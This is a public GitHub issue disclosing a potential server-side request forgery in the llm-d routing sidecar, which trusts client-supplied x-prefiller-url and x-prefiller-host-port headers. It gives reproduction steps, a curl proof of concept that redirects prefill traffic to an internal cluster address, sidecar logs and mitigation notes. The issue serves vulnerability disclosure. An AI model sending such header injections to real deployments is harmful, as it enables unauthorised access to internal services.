Potential SSRF via `x-prefiller-url` or `x-prefiller-host-port` header

## Disclaimer

Since the project is new and I've not seen any responsible disclosure process documented (as stated here https://llm-d.ai/docs/community/contribute#security), I'm creating a public issue in the hope that many are still only experimenting with llm-d and it's not affecting their production setup.

## Problem

There is a potential for Server-Side Request Forgery (SSRF). 

The routing sidecar honors the `x-prefiller-url` and `x-prefiller-host-port` headers, however, I'd expect the header to not be passed through by the scheduler or Gateway (at least) from external, user-provided requests.

This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.

## To Reproduce

1. Deploy a model fronted by Gateway and the inference scheduler on a cluster (e.g., KinD).
3. Send a POST request to the model's inference endpoint via the gateway.
5. In the request, include the header x-prefiller-url pointing to an arbitrary internal service address. 
7. Observe that the request is successfully processed by the unintended service.

## Example curl command

The following command was sent to the gateway at 172.18.0.3. It includes the `x-prefiller-url` header, which points to an arbitrary internal IP http://10.244.0.51:8000. The request succeeds with a 200 OK status, indicating the sidecar forwarded the request as instructed by the header.

```bash
curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions
```

and you will see logs like these for the sidecar:

```
I0703 09:55:11.606604       1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331       1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347       1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351       1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355       1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361       1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389       1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"
```

## Notes

- Egress network policy can mitigate the issue for external and cluster internal traffic (however, it's not very simple to configure OOTB as vllm needs to connect to HF, etc to download the model(s))
- Unclear if an HTTPRoute filter that removes the header would mitigate the issue **and** not break the P/D functionality since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Potential SSRF via `x-prefiller-url` or `x-prefiller-host-port` header #242

Disclaimer

Problem

To Reproduce

Example curl command

Notes

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Potential SSRF via x-prefiller-url or x-prefiller-host-port header #242

Description

Disclaimer

Problem

To Reproduce

Example curl command

Notes

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

Potential SSRF via `x-prefiller-url` or `x-prefiller-host-port` header #242